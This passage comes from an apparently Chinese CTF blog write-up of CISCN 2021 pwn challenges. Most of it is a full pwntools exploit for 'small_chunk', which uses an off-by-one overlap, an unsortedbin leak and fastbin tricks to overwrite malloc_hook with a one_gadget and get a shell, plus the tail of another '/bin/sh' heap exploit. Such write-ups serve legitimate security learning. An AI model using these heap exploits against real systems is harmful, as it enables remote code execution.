class="string">&quot;\x04&quot;</span>) <span class="comment">#4</span></span><br><span class="line">add(<span class="number">0x48</span>,p64(system_addr))<span class="comment">#5</span></span><br><span class="line"></span><br><span class="line">heap_system = heap_base+<span class="number">0x50</span>+<span class="number">0x50</span>+<span class="number">0x60</span>+<span class="number">0x60</span>+<span class="number">0x20</span>+<span class="number">0x10</span></span><br><span class="line">delete(<span class="number">3</span>)</span><br><span class="line">delete(<span class="number">4</span>)</span><br><span class="line">add(<span class="number">0x18</span>,<span class="string">&quot;/bin/sh\x00&quot;</span>+p64(heap_system)) <span class="comment">#6</span></span><br><span class="line">delete(<span class="number">3</span>)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></div></figure>

<p>3.small_chunk：我觉得出得最好的是这道题，确实不错。</p>
<p>(1)首先布局，利用off-by-one制作堆块重叠，然后unsortedbin泄露地址。</p>
<p>(2)由于chunk只能申请0x20和0x30，所以想要打fastbin attack，一般有以下三种方案来绕过：</p>
<p>①调用malloc_consolidate，整理fastbin中的chunk，使得fake_chunk的size变成合法的。这个有三种情况，具体分析，我都尝试了个遍，这里一个也用不了。</p>
<p>②利用unsotedbin attack，不过这个只能针对0x7f的情况，这里不太行。</p>
<p>③利用fastbinY链表，先伪造一个fastbin_chunk的fd为0x21或者0x31，申请回来fastbin_chunk，将0x21或者0x31留到fastbinY链表中，这样在main_arena中就留下了一个0x21或者0x31的数值，就可以利用这个数值伪造size来申请chunk到main_arena。之后0x20和0x30的fastbin打配合，将top_chunk地址改成malloc_hook的地方，再申请就可以申请到malloc_hook了。</p>
<p>需要注意的是，top_chunk改地址，需要绕过一些检测，所以一般两种情况：</p>
<p>A.free_hook-0xb58</p>
<p>B.malloc_hook-0x10</p>
<p>以上两种的size域都是一个libc地址，能够通过检测</p>
<p>这里由于堆块个数不够用，所以选择方案B，修改完malloc_hook为one_gadget后，再申请即可getshell。</p>
<p>▲这里在后面的复现中有点犯蠢，本来想申请到bss段上的，没办法泄露elf基地址。vmmap一看，发现heap_base和bss段固定偏移0x1000，这可给我高兴坏了，直接打bss段的size区域的地方。打完后，关机之后，再打开发现不顶用了。得，ASLR我之前给关了，再开就不是固定偏移了…..</p>
<figure class="highlight python"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding:UTF-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="comment">#from LibcSearcher import *</span></span><br><span class="line"><span class="comment">#context.log_level = &#x27;debug&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#context</span></span><br><span class="line">context.arch = <span class="string">&#x27;amd64&#x27;</span></span><br><span class="line">SigreturnFrame(kernel = <span class="string">&#x27;amd64&#x27;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">binary = <span class="string">&quot;./small_chunk&quot;</span></span><br><span class="line">libc_file = <span class="string">&quot;./libc.so.6&quot;</span></span><br><span class="line"><span class="comment">#libc_file = &quot;/lib/x86_64-linux-gnu/libc-2.23.so&quot;</span></span><br><span class="line"><span class="comment">#libc_file = &quot;&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#libcsearcher use</span></span><br><span class="line"><span class="comment">#32bit:malloc_hook = main_arena-0x18</span></span><br><span class="line"><span class="comment">#32bit:main_arena+56(unsortedbin_addr)</span></span><br><span class="line"><span class="comment">#64bit:main_arena+96(unsortedbin_addr)//88 aslo have</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">malloc_hook = main_arena-0x10</span></span><br><span class="line"><span class="string">obj = LibcSearcher(&quot;__malloc_hook&quot;, malloc_hook)</span></span><br><span class="line"><span class="string">obj = LibcSearcher(&quot;fgets&quot;, 0Xd90)</span></span><br><span class="line"><span class="string">libc_base = fgets-obj.dump(&#x27;fgets&#x27;)</span></span><br><span class="line"><span class="string">system_addr = libc_base + obj.dump(&quot;system&quot;) #system</span></span><br><span class="line"><span class="string">binsh_addr = libc_base + obj.dump(&quot;str_bin_sh&quot;)</span></span><br><span class="line"><span class="string">log.info(&quot;system_addr:0x%x&quot;%system_addr)</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#malloc_hook,main_aren Find</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">python2 LibcOffset.py libc-2.23.so</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#without stripped</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">puts_got = elf.got[&#x27;puts&#x27;]</span></span><br><span class="line"><span class="string">puts_plt = elf.plt[&#x27;puts&#x27;]</span></span><br><span class="line"><span class="string">system_plt = elf.plt[&#x27;system&#x27;]</span></span><br><span class="line"><span class="string">read_plt = elf.plt[&#x27;read&#x27;]</span></span><br><span class="line"><span class="string">main_addr = elf.sym[&#x27;main&#x27;]</span></span><br><span class="line"><span class="string">free_hook = libc_base + libc.sym[&#x27;__free_hook&#x27;]</span></span><br><span class="line"><span class="string">system_addr = libc_base + libc.sym[&#x27;system&#x27;]</span></span><br><span class="line"><span class="string">binsh_addr = libc_base + libc.search(&#x27;/bin/sh&#x27;).next()</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">#usually gadget:</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">u_gadget1 = elf.sym[&#x27;__libc_csu_init&#x27;] + 0x5a</span></span><br><span class="line"><span class="string">u_gadget2 = elf.sym[&#x27;__libc_csu_init&#x27;] + 0x40</span></span><br><span class="line"><span class="string">pop_rdi_ret = elf.sym[&#x27;__libc_csu_init&#x27;] + 0x63</span></span><br><span class="line"><span class="string">ret = elf.sym[&#x27;__libc_csu_init&#x27;] + 0x64</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">local = <span class="number">1</span></span><br><span class="line"><span class="keyword">if</span> local:</span><br><span class="line">    <span class="comment">#p = process(binary)</span></span><br><span class="line">    p = process(binary, env=&#123;<span class="string">&quot;LD_PRELOAD&quot;</span>:<span class="string">&quot;./libc.so.6&quot;</span>&#125;)</span><br><span class="line">    elf = ELF(binary)</span><br><span class="line">    libc = ELF(libc_file)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    p = remote(<span class="string">&quot;node3.buuoj.cn&quot;</span>,<span class="string">&quot;49153&quot;</span>)</span><br><span class="line">    elf = ELF(binary)</span><br><span class="line">    libc = ELF(libc_file)</span><br><span class="line"></span><br><span class="line">sd = <span class="keyword">lambda</span> s:p.send(s)</span><br><span class="line">sl = <span class="keyword">lambda</span> s:p.sendline(s)</span><br><span class="line">rc = <span class="keyword">lambda</span> s:p.recv(s)</span><br><span class="line">ru = <span class="keyword">lambda</span> s:p.recvuntil(s)</span><br><span class="line">rl = <span class="keyword">lambda</span> :p.recvline()</span><br><span class="line">sa = <span class="keyword">lambda</span> a,s:p.sendafter(a,s)</span><br><span class="line">sla = <span class="keyword">lambda</span> a,s:p.sendlineafter(a,s)</span><br><span class="line"></span><br><span class="line">menu = <span class="string">&quot;&gt;&gt; &quot;</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span>(<span class="params">size</span>):</span></span><br><span class="line">    sla(menu, <span class="string">&quot;1&quot;</span>)</span><br><span class="line">    sla(<span class="string">&quot;size: &quot;</span>, <span class="built_in">str</span>(size))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">delete</span>(<span class="params">idx</span>):</span></span><br><span class="line">    sla(menu, <span class="string">&quot;2&quot;</span>)</span><br><span class="line">    sla(<span class="string">&quot;index: &quot;</span>, <span class="built_in">str</span>(idx))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span>(<span class="params">idx</span>):</span></span><br><span class="line">    sla(menu, <span class="string">&quot;3&quot;</span>)</span><br><span class="line">    sla(<span class="string">&quot;index: &quot;</span>, <span class="built_in">str</span>(idx))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span>(<span class="params">idx, con</span>):</span></span><br><span class="line">    sla(menu, <span class="string">&quot;4&quot;</span>)</span><br><span class="line">    sla(<span class="string">&quot;index: &quot;</span>, <span class="built_in">str</span>(idx))</span><br><span class="line">    sa(<span class="string">&quot;content: &quot;</span>,con)</span><br><span class="line"></span><br><span class="line">add(<span class="number">0x18</span>)<span class="comment">#0</span></span><br><span class="line">add(<span class="number">0x18</span>)<span class="comment">#1</span></span><br><span class="line">delete(<span class="number">1</span>)</span><br><span class="line">delete(<span class="number">0</span>)</span><br><span class="line">add(<span class="number">0x18</span>)</span><br><span class="line">show(<span class="number">0</span>)</span><br><span class="line">ru(<span class="string">&quot;content: &quot;</span>)</span><br><span class="line">heap_base = u64(rc(<span class="number">6</span>).ljust(<span class="number">8</span>,<span class="string">&quot;\x00&quot;</span>))-<span class="number">0x20</span></span><br><span class="line">log.info(<span class="string">&quot;heap_base:%x&quot;</span>%heap_base)</span><br><span class="line">add(<span class="number">0x18</span>)<span class="comment">#1</span></span><br><span class="line">chunk2_addr = heap_base+<span class="number">0x40</span></span><br><span class="line">log.info(<span class="string">&quot;chunk2_addr:%x&quot;</span>%chunk2_addr)</span><br><span class="line"></span><br><span class="line">add(<span class="number">0x28</span>) <span class="comment">#idx2</span></span><br><span class="line">add(<span class="number">0x28</span>) <span class="comment">#idx3</span></span><br><span class="line">add(<span class="number">0x28</span>) <span class="comment">#idx4</span></span><br><span class="line"></span><br><span class="line">add(<span class="number">0x28</span>) <span class="comment">#idx5</span></span><br><span class="line">add(<span class="number">0x28</span>) <span class="comment">#idx6</span></span><br><span class="line">add(<span class="number">0x18</span>) <span class="comment">#idx7</span></span><br><span class="line"></span><br><span class="line">add(<span class="number">0x28</span>) <span class="comment">#idx8</span></span><br><span class="line">add(<span class="number">0x28</span>) <span class="comment">#idx9</span></span><br><span class="line">add(<span class="number">0x28</span>) <span class="comment">#idx10</span></span><br><span class="line">edit(<span class="number">2</span>,</span><br><span class="line">p64(<span class="number">0x0</span>)+p64(<span class="number">0x81</span>) <span class="comment">#fakechunk.pre_size,fakechunk.size</span></span><br><span class="line">+p64(chunk2_addr+<span class="number">0x10</span>)+p64(chunk2_addr+<span class="number">0x10</span>) <span class="comment">#fakechunk.fd,fakechunk.bk</span></span><br><span class="line">+p64(<span class="number">0x80</span>)+p64(<span class="number">0x31</span>)) <span class="comment">#chunk1.pre_size, fakechunk.size = sizeof(chunka)-0x10</span></span><br><span class="line"><span class="comment">#trigger off-by-null or other overflow to set chunkb.pre_inuse equals to 1;</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">edit(<span class="number">4</span>,p64(<span class="number">0x0</span>)*<span class="number">4</span>+p64(<span class="number">0x80</span>)+p64(<span class="number">0xb0</span>)) <span class="comment">#chunk1.pre_size, fakechunk.size = sizeof(chunka)-0x10</span></span><br><span class="line"><span class="comment">#trigger off-by-null or other overflow to set chunkb.pre_inuse equals to 1;</span></span><br><span class="line">delete(<span class="number">5</span>)</span><br><span class="line">add(<span class="number">0x18</span>) <span class="comment">#5</span></span><br><span class="line">edit(<span class="number">2</span>,<span class="string">&quot;A&quot;</span>*<span class="number">0x10</span>)</span><br><span class="line">show(<span class="number">2</span>)</span><br><span class="line">ru(<span class="string">&quot;content: &quot;</span>)</span><br><span class="line">rc(<span class="number">0x10</span>)</span><br><span class="line">main_arena = u64(rc(<span class="number">6</span>).ljust(<span class="number">8</span>,<span class="string">&quot;\x00&quot;</span>))-<span class="number">88</span> -<span class="number">0x100</span>-<span class="number">0x20</span></span><br><span class="line">malloc_hook = main_arena-<span class="number">0x10</span></span><br><span class="line">libc_base = malloc_hook-libc.sym[<span class="string">&#x27;__malloc_hook&#x27;</span>]</span><br><span class="line">log.info(<span class="string">&quot;libc_base:0x%x&quot;</span>%libc_base)</span><br><span class="line">system_addr = libc_base + libc.sym[<span class="string">&quot;system&quot;</span>] <span class="comment">#system</span></span><br><span class="line">free_hook_addr = libc_base + libc.sym[<span class="string">&quot;__free_hook&quot;</span>]</span><br><span class="line">malloc_hook_addr = libc_base +libc.sym[<span class="string">&quot;__malloc_hook&quot;</span>]</span><br><span class="line">top_addr_main = main_arena+<span class="number">88</span></span><br><span class="line">one_gadget = libc_base + <span class="number">0xf1247</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">log.info(<span class="string">&quot;free_hook_addr:0x%x&quot;</span>%free_hook_addr)</span><br><span class="line">log.info(<span class="string">&quot;system_addr:0x%x&quot;</span>%system_addr)</span><br><span class="line">log.info(<span class="string">&quot;main_arena:0x%x&quot;</span>%main_arena)</span><br><span class="line">log.info(<span class="string">&quot;malloc_hook_addr:0x%x&quot;</span>%malloc_hook_addr)</span><br><span class="line">add(<span class="number">0x28</span>) <span class="comment">#11</span></span><br><span class="line">edit(<span class="number">11</span>,<span class="string">&quot;/bin/sh\x00&quot;</span>)</span><br><span class="line">add(<span class="number">0x28</span>) <span class="comment">#12</span></span><br><span class="line">add(<span class="number">0x28</span>) <span class="comment">#13</span></span><br><span class="line">add(<span class="number">0x28</span>) <span class="comment">#14</span></span><br><span class="line">add(<span class="number">0x18</span>) <span class="comment">#15</span></span><br><span class="line">delete(<span class="number">7</span>)</span><br><span class="line">edit(<span class="number">15</span>,p64(<span class="number">0x31</span>))</span><br><span class="line">add(<span class="number">0x18</span>)<span class="comment">#7</span></span><br><span class="line">delete(<span class="number">4</span>)</span><br><span class="line">edit(<span class="number">12</span>,p64(main_arena))</span><br><span class="line">add(<span class="number">0x28</span>)<span class="comment">#4</span></span><br><span class="line">add(<span class="number">0x28</span>)<span class="comment">#16</span></span><br><span class="line">edit(<span class="number">16</span>,p64(main_arena+<span class="number">0x30</span>)+p64(<span class="number">0x0</span>)</span><br><span class="line">+p64(<span class="number">0x0</span>)*<span class="number">3</span>+p64(<span class="number">0x31</span>))</span><br><span class="line">add(<span class="number">0x28</span>)<span class="comment">#17</span></span><br><span class="line">edit(<span class="number">17</span>,p64(<span class="number">0x0</span>)*<span class="number">3</span>+p64(malloc_hook_addr-<span class="number">0x10</span>))</span><br><span class="line">pause()</span><br><span class="line">add(<span class="number">0x28</span>)<span class="comment">#18</span></span><br><span class="line">add(<span class="number">0x28</span>)<span class="comment">#19</span></span><br><span class="line">edit(<span class="number">19</span>,p64(one_gadget))</span><br><span class="line">pause()</span><br><span class="line">add(<span class="number">0x28</span>)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></div></figure>

<p>其实这次比赛也学到很多，虽然比赛的时候一道题也没写出来，总的来说还是自己的经验太少。</p>
</div><footer class="post-footer"><div class="post-ending ending"><div class="ending__text">------ END ------</div></div><div class="post-copyright copyright"><div class="copyright-author"><span class="copyright-author__name">Author: </span><span class="copyright-author__value"><a href="http://PIG-007.github.io">PIG-007</a></span></div><div class="copyright-link"><span class="copyright-link__name">Link: </span><span class="copyright-link__value"><a href="http://pig-007.github.io/2021/08/14/CISCN2021%E4%B8%9C%E5%8C%97%E8%B5%9B%E5%8C%BA%E5%A4%8D%E7%8E%B0/">http://pig-007.github.io/2021/08/14/CISCN2021%E4%B8%9C%E5%8C%97%E8%B5%9B%E5%8C%BA%E5%A4%8D%E7%8E%B0/</a></span></div><div class="copyright-notice"><span class="copyright-notice__name">Copyright: </span><span class="copyright-notice__value">All articles in this blog are licensed under <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.en" rel="external nofollow" target="_blank">BY-NC-SA</a> unless stating additionally</span></div></div><div class="post-tags"><span class="post-tags-item"><span class="post-tags-item__icon"><i class="fas fa-tag"></i></span><a class="post-tags-item__link" href="http://pig-007.github.io/tags/%E6%AF%94%E8%B5%9B/">比赛</a></span></div><nav class="post-paginator paginator"><div class="paginator-prev"><a class="paginator-prev__link" href="/2021/08/14/CSAW%20Quals%20CTF%202017-pilot/"><span class="paginator-prev__icon"><i class="fas fa-angle-left"></i></span><span class="paginator-prev__text">CSAW Quals CTF 2017-pilot</span></a></div><div class="paginator-next"><a class="paginator-next__link" href="/2021/08/14/HCTF2018_the_end/"><span class="paginator-prev__text">HCTF2018_the_end</span><span class="paginator-next__icon"><i class="fas fa-angle-right"></i></span></a></div></nav></footer></div></div></div><div class="sidebar-wrap" id="sidebar-wrap"><aside class="sidebar" id="sidebar"><div class="sidebar-nav"><span class="sidebar-nav-toc current">Catalog</span><span class="sidebar-nav-ov">Overview</span></div><section class="sidebar-toc"></section><!-- ov = overview--><section class="sidebar-ov hide"><div class="sidebar-ov-author"><div class="sidebar-ov-author__avatar"><img class="sidebar-ov-author__avatar_img" src="https://pig-007.oss-cn-beijing.aliyuncs.com/typoraImgsauthor.jpg" alt="avatar"></div><p class="sidebar-ov-author__text">hello world</p></div><div class="sidebar-ov-state"><a class="sidebar-ov-state-item sidebar-ov-state-item--posts" href="/archives/"><div class="sidebar-ov-state-item__count">92</div><div class="sidebar-ov-state-item__name">Archives</div></a><a class="sidebar-ov-state-item sidebar-ov-state-item--categories" href="/categories/"><div class="sidebar-ov-state-item__count">40</div><div class="sidebar-ov-state-item__name">Categories</div></a><a class="sidebar-ov-state-item sidebar-ov-state-item--tags" href="/tags/"><div class="sidebar-ov-state-item__count">42</div><div class="sidebar-ov-state-item__name">Tags</div></a></div><div class="sidebar-ov-cc"><a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.en" target="_blank" rel="noopener" data-popover="Creative Commons" data-popover-pos="up"><img src="/images/cc-by-nc-sa.svg"></a></div></section><div class="sidebar-reading"><div class="sidebar-reading-info"><span class="sidebar-reading-info__text">You have read </span><span class="sidebar-reading-info__num">0</span><span class="sidebar-reading-info__perc">%</span></div><div class="sidebar-reading-line"></div></div></aside></div><div class="clearfix"></div></div></main><footer class="footer" id="footer"><div class="footer-inner"><div><span>Copyright © 2021</span><span class="footer__icon"><i class="fas fa-heart"></i></span><span>PIG-007</span></div><div><span>Powered by <a href="http://hexo.io/" title="Hexo" target="_blank" rel="noopener">Hexo</a></span><span> v5.4.0</span><span class="footer__devider">|</span><span>Theme - <a href="https://github.com/liuyib/hexo-theme-stun/" title="Stun" target="_blank" rel="noopener">Stun</a></span><span> v2.6.2</span></div></div></footer><div class="loading-bar" id="loading-bar"><div class="loading-bar__progress"></div></div><div class="back2top" id="back2top"><span class="back2top__icon"><i class="fas fa-rocket"></i></span></div></div><div class="search-mask"></div><div class="search-popup"><span class="search-close"></span><div class="search-input"><input placeholder="Search for Posts (Support multiple keywords)"></div><div class="search-results"></div></div><script src="https://cdn.jsdelivr.net/npm/jquery@v3.4.1/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@1.5.2/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@1.5.2/velocity.ui.min.js"></script><script>function initSearch() {
  var isXML = true;
  var search_path = 'search.json';

  if (!search_path) {
    search_path = 'search.xml';
  } else if (/json$/i.test(search_path)) {
    isXML = false;
  }

  var path = '/' + search_path;
  $.ajax({
    url: path,
    dataType: isXML ? 'xml' : 'json',
    async: true,
    success: function (res) {
      var datas = isXML ? $('entry', res).map(function () {
        // 将 XML 转为 JSON
        return {
          title: $('title', this).text(),
          content: $('content', this).text(),
          url: $('url', this).text()
        };
      }).get() : res;
      var $input = $('.search-input input');
      var $result = $('.search-results');
      // 搜索对象（标题、内容）的权重，影响显示顺序
      var WEIGHT = { title: 100, content: 1 };
      var searchPost = function () {
        var searchText = $input.val().toLowerCase().trim();
        // 根据空白字符分隔关键字
        var keywords = searchText.split(/[\s]+/);
        // 搜索结果
        var matchPosts = [];

        // 有多个关键字时，将原文字整个保存下来
        if (keywords.length > 1) {
          keywords.push(searchText);
        }
        // 防止未输入字符时搜索
        if (searchText.length > 0) {
          datas.forEach(function (data) {
            var isMatch  = false;
            // 没有标题的文章使用预设的 i18n 变量代替
            var title = (data.title && data.title.trim()) || '[ Untitled ]';
            var titleLower = title && title.toLowerCase();
            // 删除 HTML 标签 和 所有空白字符
            var content = data.content && data.content.replace(/<[^>]+>/g, '');
            var contentLower = content && content.toLowerCase();
            // 删除重复的 /
            var postURL = data.url && decodeURI(data.url).replace(/\/{2,}/g, '/');
            // 标题中匹配到的关键词
            var titleHitSlice = [];
            // 内容中匹配到的关键词
            var contentHitSlice = [];

            keywords.forEach(function (keyword) {
              /**
              * 获取匹配的关键词的索引
              * @param {String} keyword 要匹配的关键字
              * @param {String} text 原文字
              * @param {Boolean} caseSensitive 是否区分大小写
              * @param {Number} weight 匹配对象的权重。权重大的优先显示
              * @return {Array}
              */
              function getIndexByword (word, text, caseSensitive, weight) {
                if (!word || !text) {
                  return [];
                };

                var startIndex = 0; // 每次匹配的开始索引
                var index = -1;     // 匹配到的索引值
                var result = [];    // 匹配结果

                if (!caseSensitive) {
                  word = word.toLowerCase();
                  text = text.toLowerCase();
                }

                while((index = text.indexOf(word, startIndex)) !== -1) {
                  var hasMatch = false;
                  // 索引位置相同的关键词，保留长度较长的
                  titleHitSlice.forEach(function (hit) {
                    if (hit.index === index && hit.word.length < word.length) {
                      hit.word = word;
                      hasMatch = true;
                    }
                  });
                  startIndex = index + word.length;
                  !hasMatch && result.push({ index: index, word: word, weight: weight });
                }
                return result;
              }
              titleHitSlice = titleHitSlice.concat(getIndexByword(keyword, titleLower, false, WEIGHT.title));
              contentHitSlice = contentHitSlice.concat(getIndexByword(keyword, contentLower, false, WEIGHT.content));
            });

            var hitTitle = titleHitSlice.length;
            var hitContent = contentHitSlice.length;

            if (hitTitle > 0 || hitContent > 0) {
              isMatch = true;
            }
            if (isMatch) {
              ;[titleHitSlice, contentHitSlice].forEach(function (hit) {
                // 按照匹配文字的索引的递增顺序排序
                hit.sort(function (left, right) {
                  return left.index - right.index;
                });
              });
              /**
              * 给文本中匹配到的关键词添加标记，从而进行高亮显示
              * @param {String} text 原文本
              * @param {Array} hitSlice 匹配项的索引信息
              * @param {Number} start 开始索引
              * @param {Number} end 结束索引
              * @return {String}
              */
              function highlightKeyword (text, hitSlice, start, end) {
                if (!text || !hitSlice || !hitSlice.length) {
                  return;
                }

                var result = '';
                var startIndex = start;
                var endIndex = end;
                hitSlice.forEach(function (hit) {
                  if (hit.index < startIndex) {
                    return;
                  }

                  var hitWordEnd = hit.index + hit.word.length;
                  result += text.slice(startIndex, hit.index);
                  result += '<b>' + text.slice(hit.index, hitWordEnd) + '</b>';
                  startIndex = hitWordEnd;
                });
                result += text.slice(startIndex, endIndex);
                return result;
              }

              var postData = {};
              // 文章总的搜索权重
              var postWeight = titleHitSlice.length * WEIGHT.title + contentHitSlice.length * WEIGHT.content;
              // 标记匹配关键词后的标题
              var postTitle = highlightKeyword(title, titleHitSlice, 0, title.length) || title;
              // 标记匹配关键词后的内容
              var postContent;
              // 显示内容的长度
              var SHOW_WORD_LENGTH = 200;
              // 命中关键词前的字符显示长度
              var SHOW_WORD_FRONT_LENGTH = 20;
              var SHOW_WORD_END_LENGTH = SHOW_WORD_LENGTH - SHOW_WORD_FRONT_LENGTH;

              // 截取匹配的第一个字符，前后共 200 个字符来显示
              if (contentHitSlice.length > 0) {
                var firstIndex = contentHitSlice[0].index;
                var start = firstIndex > SHOW_WORD_FRONT_LENGTH ? firstIndex - SHOW_WORD_FRONT_LENGTH : 0;
                var end = firstIndex + SHOW_WORD_END_LENGTH;
                postContent = highlightKeyword(content, contentHitSlice, start, end);
              } else { // 未匹配到内容，直接截取前 200 个字符来显示
                postContent = content.slice(0, SHOW_WORD_LENGTH);
              }
              postData.title = postTitle;
              postData.content = postContent;
              postData.url = postURL;
              postData.weight = postWeight;
              matchPosts.push(postData);
            }
          });
        }

        var resultInnerHtml = '';
        if (matchPosts.length) {
          // 按权重递增的顺序排序，使权重大的优先显示
          matchPosts.sort(function (left, right) {
            return right.weight - left.weight;
          });
          resultInnerHtml += '<ul>';
          matchPosts.forEach(function (post) {
            resultInnerHtml += '<li><a class="search-results-title" href="' + post.url + '">';
            resultInnerHtml += post.title;
            resultInnerHtml += '</a><div class="search-results-content">';
            resultInnerHtml += post.content;
            resultInnerHtml += '</div></li>';
          });
          resultInnerHtml += '</ul>';
        } else {
          resultInnerHtml += '<div class="search-results-none"><i class="far fa-meh"></i></div>';
        }
        $result.html(resultInnerHtml);
      };
      $input.on('input', searchPost);
      $input.on('keyup', function (e) {
        if (e.keyCode === Stun.utils.codeToKeyCode('Enter')) {
          searchPost();
        }
      });
    }
  });
}

function closeSearch () {
  $('body').css({ overflow: 'auto' });
  $('.search-popup').css({ display: 'none' });
  $('.search-mask').css({ display: 'none' });
}

window.addEventListener('DOMContentLoaded', function () {
  Stun.utils.pjaxReloadLocalSearch = function () {
    $('.header-nav-search').on('click', function (e) {
      e.stopPropagation();
      $('body').css('overflow', 'hidden');
      $('.search-popup')
        .velocity('stop')
        .velocity('transition.expandIn', {
          duration: 300,
          complete: function () {
            $('.search-popup input').focus();
          }
        });
      $('.search-mask')
        .velocity('stop')
        .velocity('transition.fadeIn', {
          duration: 300
        });

      initSearch();
    });
    $('.search-mask, .search-close').on('click', function () {
      closeSearch();
    });
    $(document).on('keydown', function (e) {
      // Escape <=> 27
      if (e.keyCode === Stun.utils.codeToKeyCode('Escape')) {
        closeSearch();
      }
    });
  };

  Stun.utils.pjaxReloadLocalSearch();
}, false);

function safeOpenUrl(url) {
  var newTab = window.open();
  newTab.opener = null;
  newTab.location = url;
}

function extSearch(engine) {
  var engines = {
    google: 'https://www.google.com/search?q=',
    bing: 'https://cn.bing.com/search?q=',
    baidu: 'https://www.baidu.com/s?ie=UTF-8&wd=',
  };
